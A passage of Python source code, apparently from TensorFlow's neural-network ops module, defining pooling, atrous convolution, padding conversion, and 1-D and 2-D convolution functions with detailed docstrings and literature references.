dilation_rate: Optional. Dilation rate. List of N ints >= 1.
Defaults to [1]*N. If any value of dilation_rate is > 1, then all values
of strides must be 1.
strides: Optional. Sequence of N ints >= 1. Defaults to [1]*N.
If any value of strides is > 1, then all values of dilation_rate must be
1.
name: Optional. Name of the op.
data_format: A string or None. Specifies whether the channel dimension of
the `input` and output is the last dimension (default, or if `data_format`
does not start with "NC"), or the second dimension (if `data_format`
starts with "NC"). For N=1, the valid values are "NWC" (default) and
"NCW". For N=2, the valid values are "NHWC" (default) and "NCHW".
For N=3, the valid values are "NDHWC" (default) and "NCDHW".
dilations: Alias for dilation_rate
Returns:
Tensor of rank N+2, of shape
[batch_size] + output_spatial_shape + [num_channels]
if data_format is None or does not start with "NC", or
[batch_size, num_channels] + output_spatial_shape
if data_format starts with "NC",
where `output_spatial_shape` depends on the value of padding:
If padding = "SAME":
output_spatial_shape[i] = ceil(input_spatial_shape[i] / strides[i])
If padding = "VALID":
output_spatial_shape[i] =
ceil((input_spatial_shape[i] - (window_shape[i] - 1) * dilation_rate[i])
/ strides[i]).
Raises:
ValueError: if arguments are invalid.
"""
dilation_rate = deprecated_argument_lookup(
"dilations", dilations, "dilation_rate", dilation_rate)
# pylint: enable=line-too-long
with ops.name_scope(name, "%s_pool" % (pooling_type.lower()),
[input]) as scope:
input = ops.convert_to_tensor(input, name="input") # pylint: disable=redefined-builtin
num_spatial_dims = len(window_shape)
if num_spatial_dims < 1 or num_spatial_dims > 3:
raise ValueError("It is required that 1 <= num_spatial_dims <= 3.")
input.get_shape().with_rank(num_spatial_dims + 2)
strides, dilation_rate = _get_strides_and_dilation_rate(
num_spatial_dims, strides, dilation_rate)
if padding == "SAME" and np.any(dilation_rate > 1):
raise ValueError(
"pooling with SAME padding is not implemented for dilation_rate > 1")
if np.any(strides > window_shape):
raise ValueError(
"strides > window_shape not supported due to inconsistency between "
"CPU and GPU implementations")
pooling_ops = {
("MAX", 1): max_pool,
("MAX", 2): max_pool,
("MAX", 3): max_pool3d, # pylint: disable=undefined-variable
("AVG", 1): avg_pool,
("AVG", 2): avg_pool,
("AVG", 3): avg_pool3d, # pylint: disable=undefined-variable
}
op_key = (pooling_type, num_spatial_dims)
if op_key not in pooling_ops:
raise ValueError("%d-D %s pooling is not supported." % (op_key[1],
op_key[0]))
if data_format is None or not data_format.startswith("NC"):
adjusted_window_shape = [1] + list(window_shape) + [1]
adjusted_strides = [1] + list(strides) + [1]
spatial_dims = range(1, num_spatial_dims + 1)
else:
adjusted_window_shape = [1, 1] + list(window_shape)
adjusted_strides = [1, 1] + list(strides)
spatial_dims = range(2, num_spatial_dims + 2)
if num_spatial_dims == 1:
if data_format is None or data_format == "NWC":
data_format_kwargs = dict(data_format="NHWC")
elif data_format == "NCW":
data_format_kwargs = dict(data_format="NCHW")
else:
raise ValueError("data_format must be either \"NWC\" or \"NCW\".")
adjusted_window_shape = [1] + adjusted_window_shape
adjusted_strides = [1] + adjusted_strides
else:
data_format_kwargs = dict(data_format=data_format)
def op(converted_input, _, converted_padding): # pylint: disable=missing-docstring
if num_spatial_dims == 1:
converted_input = array_ops.expand_dims(converted_input,
spatial_dims[0])
result = pooling_ops[op_key](
converted_input,
adjusted_window_shape,
adjusted_strides,
converted_padding,
name=scope,
**data_format_kwargs)
if num_spatial_dims == 1:
result = array_ops.squeeze(result, [spatial_dims[0]])
return result
return with_space_to_batch(
input=input,
dilation_rate=dilation_rate,
padding=padding,
op=op,
spatial_dims=spatial_dims,
filter_shape=window_shape)
@tf_export("nn.pool", v1=[])
@dispatch.add_dispatch_support
def pool_v2(
input, # pylint: disable=redefined-builtin
window_shape,
pooling_type,
strides=None,
padding="VALID",
data_format=None,
dilations=None,
name=None):
# pylint: disable=line-too-long
"""Performs an N-D pooling operation.
In the case that `data_format` does not start with "NC", computes for
0 <= b < batch_size,
0 <= x[i] < output_spatial_shape[i],
0 <= c < num_channels:
```
output[b, x[0], ..., x[N-1], c] =
REDUCE_{z[0], ..., z[N-1]}
input[b,
x[0] * strides[0] - pad_before[0] + dilation_rate[0]*z[0],
...
x[N-1]*strides[N-1] - pad_before[N-1] + dilation_rate[N-1]*z[N-1],
c],
```
where the reduction function REDUCE depends on the value of `pooling_type`,
and pad_before is defined based on the value of `padding` as described in
the "returns" section of `tf.nn.convolution` for details.
The reduction never includes out-of-bounds positions.
In the case that `data_format` starts with `"NC"`, the `input` and output are
simply transposed as follows:
```
pool(input, data_format, **kwargs) =
tf.transpose(pool(tf.transpose(input, [0] + range(2,N+2) + [1]),
**kwargs),
[0, N+1] + range(1, N+1))
```
Args:
input: Tensor of rank N+2, of shape `[batch_size] + input_spatial_shape +
[num_channels]` if data_format does not start with "NC" (default), or
`[batch_size, num_channels] + input_spatial_shape` if data_format starts
with "NC". Pooling happens over the spatial dimensions only.
window_shape: Sequence of N ints >= 1.
pooling_type: Specifies pooling operation, must be "AVG" or "MAX".
strides: Optional. Sequence of N ints >= 1. Defaults to [1]*N. If any value of
strides is > 1, then all values of dilation_rate must be 1.
padding: The padding algorithm, must be "SAME" or "VALID". Defaults to "SAME".
See the "returns" section of `tf.nn.convolution` for details.
data_format: A string or None. Specifies whether the channel dimension of
the `input` and output is the last dimension (default, or if `data_format`
does not start with "NC"), or the second dimension (if `data_format`
starts with "NC"). For N=1, the valid values are "NWC" (default) and
"NCW". For N=2, the valid values are "NHWC" (default) and "NCHW". For
N=3, the valid values are "NDHWC" (default) and "NCDHW".
dilations: Optional. Dilation rate. List of N ints >= 1. Defaults to
[1]*N. If any value of dilation_rate is > 1, then all values of strides
must be 1.
name: Optional. Name of the op.
Returns:
Tensor of rank N+2, of shape
[batch_size] + output_spatial_shape + [num_channels]
if data_format is None or does not start with "NC", or
[batch_size, num_channels] + output_spatial_shape
if data_format starts with "NC",
where `output_spatial_shape` depends on the value of padding:
If padding = "SAME":
output_spatial_shape[i] = ceil(input_spatial_shape[i] / strides[i])
If padding = "VALID":
output_spatial_shape[i] =
ceil((input_spatial_shape[i] - (window_shape[i] - 1) * dilation_rate[i])
/ strides[i]).
Raises:
ValueError: if arguments are invalid.
"""
return pool(
input=input,
window_shape=window_shape,
pooling_type=pooling_type,
padding=padding,
dilation_rate=dilations,
strides=strides,
name=name,
data_format=data_format)
@tf_export("nn.atrous_conv2d")
@dispatch.add_dispatch_support
def atrous_conv2d(value, filters, rate, padding, name=None):
"""Atrous convolution (a.k.a. convolution with holes or dilated convolution).
This function is a simpler wrapper around the more general
`tf.nn.convolution`, and exists only for backwards compatibility. You can
use `tf.nn.convolution` to perform 1-D, 2-D, or 3-D atrous convolution.
Computes a 2-D atrous convolution, also known as convolution with holes or
dilated convolution, given 4-D `value` and `filters` tensors. If the `rate`
parameter is equal to one, it performs regular 2-D convolution. If the `rate`
parameter is greater than one, it performs convolution with holes, sampling
the input values every `rate` pixels in the `height` and `width` dimensions.
This is equivalent to convolving the input with a set of upsampled filters,
produced by inserting `rate - 1` zeros between two consecutive values of the
filters along the `height` and `width` dimensions, hence the name atrous
convolution or convolution with holes (the French word trous means holes in
English).
More specifically:
```
output[batch, height, width, out_channel] =
sum_{dheight, dwidth, in_channel} (
filters[dheight, dwidth, in_channel, out_channel] *
value[batch, height + rate*dheight, width + rate*dwidth, in_channel]
)
```
Atrous convolution allows us to explicitly control how densely to compute
feature responses in fully convolutional networks. Used in conjunction with
bilinear interpolation, it offers an alternative to `conv2d_transpose` in
dense prediction tasks such as semantic image segmentation, optical flow
computation, or depth estimation. It also allows us to effectively enlarge
the field of view of filters without increasing the number of parameters or
the amount of computation.
For a description of atrous convolution and how it can be used for dense
feature extraction, please see: (Chen et al., 2015). The same operation is
investigated further in (Yu et al., 2016). Previous works that effectively
use atrous convolution in different ways are, among others,
(Sermanet et al., 2014) and (Giusti et al., 2013).
Atrous convolution is also closely related to the so-called noble identities
in multi-rate signal processing.
There are many different ways to implement atrous convolution (see the refs
above). The implementation here reduces
```python
atrous_conv2d(value, filters, rate, padding=padding)
```
to the following three operations:
```python
paddings = ...
net = space_to_batch(value, paddings, block_size=rate)
net = conv2d(net, filters, strides=[1, 1, 1, 1], padding="VALID")
crops = ...
net = batch_to_space(net, crops, block_size=rate)
```
Advanced usage. Note the following optimization: A sequence of `atrous_conv2d`
operations with identical `rate` parameters, 'SAME' `padding`, and filters
with odd heights/ widths:
```python
net = atrous_conv2d(net, filters1, rate, padding="SAME")
net = atrous_conv2d(net, filters2, rate, padding="SAME")
...
net = atrous_conv2d(net, filtersK, rate, padding="SAME")
```
can be equivalently performed cheaper in terms of computation and memory as:
```python
pad = ... # padding so that the input dims are multiples of rate
net = space_to_batch(net, paddings=pad, block_size=rate)
net = conv2d(net, filters1, strides=[1, 1, 1, 1], padding="SAME")
net = conv2d(net, filters2, strides=[1, 1, 1, 1], padding="SAME")
...
net = conv2d(net, filtersK, strides=[1, 1, 1, 1], padding="SAME")
net = batch_to_space(net, crops=pad, block_size=rate)
```
because a pair of consecutive `space_to_batch` and `batch_to_space` ops with
the same `block_size` cancel out when their respective `paddings` and `crops`
inputs are identical.
Args:
value: A 4-D `Tensor` of type `float`. It needs to be in the default "NHWC"
format. Its shape is `[batch, in_height, in_width, in_channels]`.
filters: A 4-D `Tensor` with the same type as `value` and shape
`[filter_height, filter_width, in_channels, out_channels]`. `filters`'
`in_channels` dimension must match that of `value`. Atrous convolution is
equivalent to standard convolution with upsampled filters with effective
height `filter_height + (filter_height - 1) * (rate - 1)` and effective
width `filter_width + (filter_width - 1) * (rate - 1)`, produced by
inserting `rate - 1` zeros along consecutive elements across the
`filters`' spatial dimensions.
rate: A positive int32. The stride with which we sample input values across
the `height` and `width` dimensions. Equivalently, the rate by which we
upsample the filter values by inserting zeros across the `height` and
`width` dimensions. In the literature, the same parameter is sometimes
called `input stride` or `dilation`.
padding: A string, either `'VALID'` or `'SAME'`. The padding algorithm.
name: Optional name for the returned tensor.
Returns:
A `Tensor` with the same type as `value`.
Output shape with `'VALID'` padding is:
[batch, height - 2 * (filter_width - 1),
width - 2 * (filter_height - 1), out_channels].
Output shape with `'SAME'` padding is:
[batch, height, width, out_channels].
Raises:
ValueError: If input/output depth does not match `filters`' shape, or if
padding is other than `'VALID'` or `'SAME'`.
References:
Multi-Scale Context Aggregation by Dilated Convolutions:
[Yu et al., 2016](https://arxiv.org/abs/1511.07122)
([pdf](https://arxiv.org/pdf/1511.07122.pdf))
Semantic Image Segmentation with Deep Convolutional Nets and Fully
Connected CRFs:
[Chen et al., 2015](http://arxiv.org/abs/1412.7062)
([pdf](https://arxiv.org/pdf/1412.7062))
OverFeat - Integrated Recognition, Localization and Detection using
Convolutional Networks:
[Sermanet et al., 2014](https://arxiv.org/abs/1312.6229)
([pdf](https://arxiv.org/pdf/1312.6229.pdf))
Fast Image Scanning with Deep Max-Pooling Convolutional Neural Networks:
[Giusti et al., 2013]
(https://ieeexplore.ieee.org/abstract/document/6738831)
([pdf](https://arxiv.org/pdf/1302.1700.pdf))
"""
return convolution(
input=value,
filter=filters,
padding=padding,
dilation_rate=np.broadcast_to(rate, (2,)),
name=name)
def convert_padding(padding, expected_length=4):
"""Converts Python padding to C++ padding for ops which take EXPLICIT padding.
Args:
padding: the `padding` argument for a Python op which supports EXPLICIT
padding.
expected_length: Expected number of entries in the padding list when
explicit padding is used.
Returns:
(padding, explicit_paddings) pair, which should be passed as attributes to a
C++ op.
Raises:
ValueError: If padding is invalid.
"""
explicit_paddings = []
if padding == "EXPLICIT":
# Give a better error message if EXPLICIT is passed.
raise ValueError('"EXPLICIT" is not a valid value for the padding '
"parameter. To use explicit padding, the padding "
"parameter must be a list.")
if isinstance(padding, (list, tuple)):
for i, dim_paddings in enumerate(padding):
if not isinstance(dim_paddings, (list, tuple)):
raise ValueError("When padding is a list, each element of padding must "
"be a list/tuple of size 2. Element with index %d of "
"padding is not a list/tuple" % i)
if len(dim_paddings) != 2:
raise ValueError("When padding is a list, each element of padding must "
"be a list/tuple of size 2. Element with index %d of "
"padding has size %d" % (i, len(dim_paddings)))
explicit_paddings.extend(dim_paddings)
if len(padding) != expected_length:
raise ValueError("When padding is a list, it must be of size %d. Got "
"padding of size: %d" % (expected_length, len(padding)))
padding = "EXPLICIT"
return padding, explicit_paddings
@tf_export(v1=["nn.conv1d"])
@dispatch.add_dispatch_support
@deprecation.deprecated_arg_values(
None,
"`NCHW` for data_format is deprecated, use `NCW` instead",
warn_once=True,
data_format="NCHW")
@deprecation.deprecated_arg_values(
None,
"`NHWC` for data_format is deprecated, use `NWC` instead",
warn_once=True,
data_format="NHWC")
def conv1d(
value=None,
filters=None,
stride=None,
padding=None,
use_cudnn_on_gpu=None,
data_format=None,
name=None,
input=None, # pylint: disable=redefined-builtin
dilations=None):
r"""Computes a 1-D convolution of input with rank `>=3` and a `3-D` filter.
Given an input tensor of shape
`batch_shape + [in_width, in_channels]`
if `data_format` is `"NWC"`, or
`batch_shape + [in_channels, in_width]`
if `data_format` is `"NCW"`,
and a filter / kernel tensor of shape
`[filter_width, in_channels, out_channels]`, this op reshapes
the arguments to pass them to `conv2d` to perform the equivalent
convolution operation.
Internally, this op reshapes the input tensors and invokes `tf.nn.conv2d`.
For example, if `data_format` does not start with "NC", a tensor of shape
`batch_shape + [in_width, in_channels]`
is reshaped to
`batch_shape + [1, in_width, in_channels]`,
and the filter is reshaped to
`[1, filter_width, in_channels, out_channels]`.
The result is then reshaped back to
`batch_shape + [out_width, out_channels]`
\(where out_width is a function of the stride and padding as in conv2d\) and
returned to the caller.
Args:
value: A Tensor of rank at least 3. Must be of type `float16`, `float32`, or
`float64`.
filters: A Tensor of rank at least 3. Must have the same type as `value`.
stride: An int or list of `ints` that has length `1` or `3`. The number of
entries by which the filter is moved right at each step.
padding: 'SAME' or 'VALID'
use_cudnn_on_gpu: An optional `bool`. Defaults to `True`.
data_format: An optional `string` from `"NWC", "NCW"`. Defaults to `"NWC"`,
the data is stored in the order of `batch_shape + [in_width,
in_channels]`. The `"NCW"` format stores data as `batch_shape +
[in_channels, in_width]`.
name: A name for the operation (optional).
input: Alias for value.
dilations: An int or list of `ints` that has length `1` or `3` which
defaults to 1. The dilation factor for each dimension of input. If set to
k > 1, there will be k-1 skipped cells between each filter element on that
dimension. Dilations in the batch and depth dimensions must be 1.
Returns:
A `Tensor`. Has the same type as input.
Raises:
ValueError: if `data_format` is invalid.
"""
value = deprecation.deprecated_argument_lookup("input", input, "value", value)
with ops.name_scope(name, "conv1d", [value, filters]) as name:
# Reshape the input tensor to batch_shape + [1, in_width, in_channels]
if data_format is None or data_format == "NHWC" or data_format == "NWC":
data_format = "NHWC"
spatial_start_dim = -3
channel_index = 2
elif data_format == "NCHW" or data_format == "NCW":
data_format = "NCHW"
spatial_start_dim = -2
channel_index = 1
else:
raise ValueError("data_format must be \"NWC\" or \"NCW\".")
strides = [1] + _get_sequence(stride, 1, channel_index, "stride")
dilations = [1] + _get_sequence(dilations, 1, channel_index, "dilations")
value = array_ops.expand_dims(value, spatial_start_dim)
filters = array_ops.expand_dims(filters, 0)
if value.shape.ndims in (4, 3, 2, 1, 0, None):
result = gen_nn_ops.conv2d(
value,
filters,
strides,
padding,
use_cudnn_on_gpu=use_cudnn_on_gpu,
data_format=data_format,
dilations=dilations,
name=name)
else:
result = squeeze_batch_dims(
value,
functools.partial(
gen_nn_ops.conv2d,
filter=filters,
strides=strides,
padding=padding,
use_cudnn_on_gpu=use_cudnn_on_gpu,
data_format=data_format,
dilations=dilations,
),
inner_rank=3,
name=name)
return array_ops.squeeze(result, [spatial_start_dim])
@tf_export("nn.conv1d", v1=[])
@dispatch.add_dispatch_support
def conv1d_v2(
input, # pylint: disable=redefined-builtin
filters,
stride,
padding,
data_format="NWC",
dilations=None,
name=None):
r"""Computes a 1-D convolution given 3-D input and filter tensors.
Given an input tensor of shape
`batch_shape + [in_width, in_channels]`
if `data_format` is `"NWC"`, or
`batch_shape + [in_channels, in_width]`
if `data_format` is `"NCW"`,
and a filter / kernel tensor of shape
`[filter_width, in_channels, out_channels]`, this op reshapes
the arguments to pass them to `conv2d` to perform the equivalent
convolution operation.
Internally, this op reshapes the input tensors and invokes `tf.nn.conv2d`.
For example, if `data_format` does not start with `"NC"`, a tensor of shape
`batch_shape + [in_width, in_channels]`
is reshaped to
`batch_shape + [1, in_width, in_channels]`,
and the filter is reshaped to
`[1, filter_width, in_channels, out_channels]`.
The result is then reshaped back to
`batch_shape + [out_width, out_channels]`
\(where out_width is a function of the stride and padding as in conv2d\) and
returned to the caller.
Args:
input: A Tensor of rank at least 3. Must be of type `float16`, `float32`, or
`float64`.
filters: A Tensor of rank at least 3. Must have the same type as `input`.
stride: An int or list of `ints` that has length `1` or `3`. The number of
entries by which the filter is moved right at each step.
padding: 'SAME' or 'VALID'
data_format: An optional `string` from `"NWC", "NCW"`. Defaults to `"NWC"`,
the data is stored in the order of
`batch_shape + [in_width, in_channels]`. The `"NCW"` format stores data
as `batch_shape + [in_channels, in_width]`.
dilations: An int or list of `ints` that has length `1` or `3` which
defaults to 1. The dilation factor for each dimension of input. If set to
k > 1, there will be k-1 skipped cells between each filter element on that
dimension. Dilations in the batch and depth dimensions must be 1.
name: A name for the operation (optional).
Returns:
A `Tensor`. Has the same type as input.
Raises:
ValueError: if `data_format` is invalid.
"""
return conv1d(
input, # pylint: disable=redefined-builtin
filters,
stride,
padding,
use_cudnn_on_gpu=True,
data_format=data_format,
name=name,
dilations=dilations)
@tf_export("nn.conv1d_transpose")
@dispatch.add_dispatch_support
def conv1d_transpose(
input, # pylint: disable=redefined-builtin
filters,
output_shape,
strides,
padding="SAME",
data_format="NWC",
dilations=None,
name=None):
"""The transpose of `conv1d`.
This operation is sometimes called "deconvolution" after
(Zeiler et al., 2010), but is actually the transpose (gradient) of `conv1d`
rather than an actual deconvolution.
Args:
input: A 3-D `Tensor` of type `float` and shape
`[batch, in_width, in_channels]` for `NWC` data format or
`[batch, in_channels, in_width]` for `NCW` data format.
filters: A 3-D `Tensor` with the same type as `input` and shape
`[filter_width, output_channels, in_channels]`. `filter`'s
`in_channels` dimension must match that of `input`.
output_shape: A 1-D `Tensor`, containing three elements, representing the
output shape of the deconvolution op.
strides: An int or list of `ints` that has length `1` or `3`. The number of
entries by which the filter is moved right at each step.
padding: A string, either `'VALID'` or `'SAME'`. The padding algorithm.
See the "returns" section of `tf.nn.convolution` for details.
data_format: A string. `'NWC'` and `'NCW'` are supported.
dilations: An int or list of `ints` that has length `1` or `3` which
defaults to 1. The dilation factor for each dimension of input. If set to
k > 1, there will be k-1 skipped cells between each filter element on that
dimension. Dilations in the batch and depth dimensions must be 1.
name: Optional name for the returned tensor.
Returns:
A `Tensor` with the same type as `input`.
Raises:
ValueError: If input/output depth does not match `filter`'s shape, if
`output_shape` is not at 3-element vector, if `padding` is other than
`'VALID'` or `'SAME'`, or if `data_format` is invalid.
References:
Deconvolutional Networks:
[Zeiler et al., 2010]
(https://ieeexplore.ieee.org/abstract/document/5539957)
([pdf]
(http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.232.4023&rep=rep1&type=pdf))
"""
with ops.name_scope(name, "conv1d_transpose",
[input, filters, output_shape]) as name:
# The format could be either NWC or NCW, map to NHWC or NCHW
if data_format is None or data_format == "NWC":
data_format = "NHWC"
spatial_start_dim = 1
channel_index = 2
elif data_format == "NCW":
data_format = "NCHW"
spatial_start_dim = 2
channel_index = 1
else:
raise ValueError("data_format must be \"NWC\" or \"NCW\".")
# Reshape the input tensor to [batch, 1, in_width, in_channels]
strides = [1] + _get_sequence(strides, 1, channel_index, "stride")
dilations = [1] + _get_sequence(dilations, 1, channel_index, "dilations")
input = array_ops.expand_dims(input, spatial_start_dim)
filters = array_ops.expand_dims(filters, 0)
output_shape = list(output_shape) if not isinstance(
output_shape, ops.Tensor) else output_shape
output_shape = array_ops.concat([output_shape[: spatial_start_dim], [1],
output_shape[spatial_start_dim:]], 0)
result = gen_nn_ops.conv2d_backprop_input(
input_sizes=output_shape,
filter=filters,
out_backprop=input,
strides=strides,
padding=padding,
data_format=data_format,
dilations=dilations,
name=name)
return array_ops.squeeze(result, spatial_start_dim)
@tf_export("nn.conv2d", v1=[])
@dispatch.add_dispatch_support
def conv2d_v2(input, # pylint: disable=redefined-builtin
filters,
strides,
padding,
data_format="NHWC",
dilations=None,
name=None):
# pylint: disable=line-too-long
r"""Computes a 2-D convolution given `input` and 4-D `filters` tensors.
The `input` tensor may have rank `4` or higher, where shape dimensions `[:-3]`
are considered batch dimensions (`batch_shape`).
Given an input tensor of shape
`batch_shape + [in_height, in_width, in_channels]` and a filter / kernel
tensor of shape `[filter_height, filter_width, in_channels, out_channels]`,
this op performs the following:
1. Flattens the filter to a 2-D matrix with shape
`[filter_height * filter_width * in_channels, output_channels]`.
2. Extracts image patches from the input tensor to form a *virtual*
tensor of shape `[batch, out_height, out_width,
filter_height * filter_width * in_channels]`.
3. For each patch, right-multiplies the filter matrix and the image patch
vector.
In detail, with the default NHWC format,
output[b, i, j, k] =
sum_{di, dj, q} input[b, strides[1] * i + di, strides[2] * j + dj, q] *
filter[di, dj, q, k]
Must have `strides[0] = strides[3] = 1`. For the most common case of the same
horizontal and vertical strides, `strides = [1, stride, stride, 1]`.
Usage Example:
>>> x_in = np.array([[
... [[2], [1], [2], [0], [1]],
... [[1], [3], [2], [2], [3]],
... [[1], [1], [3], [3], [0]],
... [[2], [2], [0], [1], [1]],
... [[0], [0], [3], [1], [2]], ]])
>>> kernel_in = np.array([
... [ [[2, 0.1]], [[3, 0.2]] ],
... [ [[0, 0.3]],[[1, 0.4]] ], ])
>>> x = tf.constant(x_in, dtype=tf.float32)
>>> kernel = tf.constant(kernel_in, dtype=tf.float32)
>>> tf.nn.conv2d(x, kernel, strides=[1, 1, 1, 1], padding='VALID')
<tf.Tensor: shape=(1, 4, 4, 2), dtype=float32, numpy=..., dtype=float32)>
Args:
input: A `Tensor`. Must be one of the following types:
`half`, `bfloat16`, `float32`, `float64`.
A Tensor of rank at least 4. The dimension order is interpreted according
to the value of `data_format`; with the all-but-inner-3 dimensions acting
as batch dimensions. See below for details.
filters: A `Tensor`. Must have the same type as `input`.
A 4-D tensor of shape
`[filter_height, filter_width, in_channels, out_channels]`
strides: An int or list of `ints` that has length `1`, `2` or `4`. The
stride of the sliding window for each dimension of `input`. If a single
value is given it is replicated in the `H` and `W` dimension. By default
the `N` and `C` dimensions are set to 1. The dimension order is determined
by the value of `data_format`, see below for details.
padding: Either the `string` `"SAME"` or `"VALID"` indicating the type of
padding algorithm to use, or a list indicating the explicit paddings at
the start and end of each dimension. When explicit padding is used and
data_format is `"NHWC"`, this should be in the form `[[0, 0], [pad_top,
pad_bottom], [pad_left, pad_right], [0, 0]]`. When explicit padding used
and data_format is `"NCHW"`, this should be in the form `[[0, 0], [0, 0],
[pad_top, pad_bottom], [pad_left, pad_right]]`.
data_format: An optional `string` from: `"NHWC", "NCHW"`.
Defaults to `"NHWC"`.
Specify the data format of the input and output data. With the
default format "NHWC", the data is stored in the order of:
`batch_shape + [height, width, channels]`.
Alternatively, the format could be "NCHW", the data storage order of:
`batch_shape + [channels, height, width]`.
dilations: An int or list of `ints` that has length `1`, `2` or `4`,
defaults to 1. The dilation factor for each dimension of`input`. If a
single value is given it is replicated in the `H` and `W` dimension. By
default the `N` and `C` dimensions are set to 1. If set to k > 1, there
will be k-1 skipped cells between each filter element on that dimension.
The dimension order is determined by the value of `data_format`, see above
for details. Dilations in the batch and depth dimensions if a 4-d tensor
must be 1.
name: A name for the operation (optional).
Returns:
A `Tensor`. Has the same type as `input` and the same outer batch shape.
"""
# pylint: enable=line-too-long
return conv2d(input, # pylint: disable=redefined-builtin
filters,
strides,
padding,
use_cudnn_on_gpu=True,
data_format=data_format,
dilations=dilations,
name=name)
@tf_export(v1=["nn.conv2d"])
@dispatch.add_dispatch_support
def conv2d( # pylint: disable=redefined-builtin,dangerous-default-value
input,
filter=None,
strides=None,
padding=None,
use_cudnn_on_gpu=True,
data_format="NHWC",
dilations=[1, 1, 1, 1],
name=None,
filters=None):
r"""Computes a 2-D convolution given 4-D `input` and `filter` tensors.
Given an input tensor of shape `[batch, in_height, in_width, in_channels]`
and a filter / kernel tensor of shape
`[filter_height, filter_width, in_channels, out_channels]`, this op
performs the following:
1. Flattens the filter to a 2-D matrix with shape
`[filter_height * filter_width * in_channels, output_channels]`.
2. Extracts image patches from the input tensor to form a *virtual*
tensor of shape `[batch, out_height, out_width,
filter_height * filter_width * in_channels]`.
3. For each patch, right-multiplies the filter matrix and the image patch
vector.
In detail, with the default NHWC format,
output[b, i, j, k] =
sum_{di, dj, q} input[b, strides[1] * i + di, strides[2] * j + dj, q]
* filter[di, dj, q, k]
Must have `strides[0] = strides[3] = 1`. For the most common case of the same
horizontal and vertical strides, `strides = [1, stride, stride, 1]`.
Args:
input: A `Tensor`. Must be one of the following types:
`half`, `bfloat16`, `float32`, `float64`.
A 4-D tensor. The dimension order is interpreted according to the value
of `data_format`, see below for details.
filter: A `Tensor`. Must have the same type as `input`.
A 4-D tensor of shape
`[filter_height, filter_width, in_channels, out_channels]`
strides: An int or list of `ints` that has length `1`, `2` or `4`. The
stride of the sliding window for each dimension of `input`. If a single
value is given it is replicated in the `H` and `W` dimension. By default
the `N` and `C` dimensions are set to 1. The dimension order is determined
by the value of `data_format`, see below for details.
padding: Either the `string` `"SAME"` or `"VALID"` indicating the type of
padding algorithm to use, or a list indicating the explicit paddings at
the start and end of each dimension. When explicit padding is used and
data_format is `"NHWC"`, this should be in the form `[[0, 0], [pad_top,
pad_bottom], [pad_left, pad_right], [0, 0]]`. When explicit padding used
and data_format is `"NCHW"`, this should be in the form `[[0, 0], [0, 0],
[pad_top, pad_bottom], [pad_left, pad_right]]`.
use_cudnn_on_gpu: An optional `bool`. Defaults to `True`.
data_format: An optional `string` from: `"NHWC", "NCHW"`.
Defaults to `"NHWC"`.
Specify the data format of the input and output data. With the
default format "NHWC", the data is stored in the order of:
[batch, height, width, channels].
Alternatively, the format could be "NCHW", the data storage order of:
[batch, channels, height, width].
dilations: An int or list of `ints` that has length `1`, `2` or `4`,
defaults to 1. The dilation factor for each dimension of`input`. If a
single value is given it is replicated in the `H` and `W` dimension. By
default the `N` and `C` dimensions are set to 1. If set to k > 1, there
will be k-1 skipped cells between each filter element on that dimension.
The dimension order is determined by the value of `data_format`, see above
for details. Dilations in the batch and depth dimensions if a 4-d tensor
must be 1.
name: A name for the operation (optional).
filters: Alias for filter.
Returns:
A `Tensor`. Has the same type as `input`.
"""
filter = deprecation.deprecated_argument_lookup(
"filters", filters, "filter", filter)
padding, explicit_paddings = convert_padding(padding)
if data_format is None:
data_format = "NHWC"
channel_index = 1 if data_format.startswith("NC") else 3
strides = _get_sequence(strides, 2, channel_index, "strides")
dilations = _get_sequence(dilations, 2, channel_index, "dilations")
shape = input.shape
# shape object may lack ndims, e.g., if input is an np.ndarray. In that case,
# we fall back to len(shape).
ndims = getattr(shape, "ndims", -1)
if ndims == -1:
ndims = len(shape)
if ndims in (4, 3, 2, 1, 0, None):
# We avoid calling squeeze_batch_dims to reduce extra python function
# call slowdown in eager mode. This branch doesn't require reshapes.
return gen_nn_ops.conv2d(
input,
filter=filter,
strides=strides,
padding=padding,
use_cudnn_on_gpu=use_cudnn_on_gpu,
explicit_paddings=explicit_paddings,
data_format=data_format,
dilations=dilations,
name=name)
return squeeze_batch_dims(
input,
functools.partial(
gen_nn_ops.conv2d,
filter=filter,
strides=strides,
padding=padding,
use_cudnn_on_gpu=use_cudnn_on_gpu,
explicit_paddings=explicit_paddings,
data_format=data_format,
dilations=dilations),
inner_rank=3,
name=name)
@tf_export(v1=["nn.conv2d_backprop_filter"])
@dispatch.add_dispatch_support
def conv2d_backprop_filter( # pylint: disable=redefined-builtin,dangerous-default-value
input,
filter_sizes,
out_backprop,
strides,
padding,
use_cudnn_on_gpu=True,
data_format="NHWC",
dilations=[1, 1, 1, 1],
name=None):
r"""Computes the gradients of convolution with respect to the filter.
Args:
input: A `Tensor`. Must be one of the following types:
`half`, `bfloat16`, `float32`, `float64`.
4-D with shape `[batch, in_height, in_width, in_channels]`.
filter_sizes: A `Tensor` of type `int32`.
An integer vector representing the tensor shape of `filter`,
where `filter` is a 4-D
`[filter_height, filter_width, in_channels, out_channels]` tensor.
out_backprop: A `Tensor`. Must have the same type as `input`.
4-D with shape `[batch, out_height, out_width, out_channels]`.
Gradients w.r.t. the output of the convolution.
strides: A list of `ints`.
The stride of the sliding window for each dimension of the input
of the convolution. Must be in the same order as the dimension specified
with format.
padding: Either the `string` `"SAME"` or `"VALID"` indicating the type of
padding algorithm to use, or a list indicating the explicit paddings at
the start and end of each dimension. When explicit padding is used and
data_format is `"NHWC"`, this should be in the form `[[0, 0], [pad_top,
pad_bottom], [pad_left, pad_right], [0, 0]]`. When explicit padding used
and data_format is `"NCHW"`, this should be in the form `[[0, 0], [0, 0],
[pad_top, pad_bottom], [pad_left, pad_right]]`.
use_cudnn_on_gpu: An optional `bool`. Defaults to `True`.
data_format: An optional `string` from: `"NHWC", "NCHW"`.
Defaults to `"NHWC"`.
Specify the data format of the input and output data. With the
default format "NHWC", the data is stored in the order of:
[batch, in_height, in_width, in_channels].
Alternatively, the format could be "NCHW", the data storage order of:
[batch, in_channels, in_height, in_width].
dilations: An optional list of `ints`. Defaults to `[1, 1, 1, 1]`.
1-D tensor of length 4. The dilation factor for each dimension of
`input`. If set to k > 1, there will be k-1 skipped cells between each
filter element on that dimension. The dimension order is determined by
the value of `data_format`, see above for details. Dilations in the batch
and depth dimensions must be 1.
name: A name for the operation (optional).
Returns:
A `Tensor`. Has the same type as `input`.
"""
padding, explicit_paddings = convert_padding(padding)
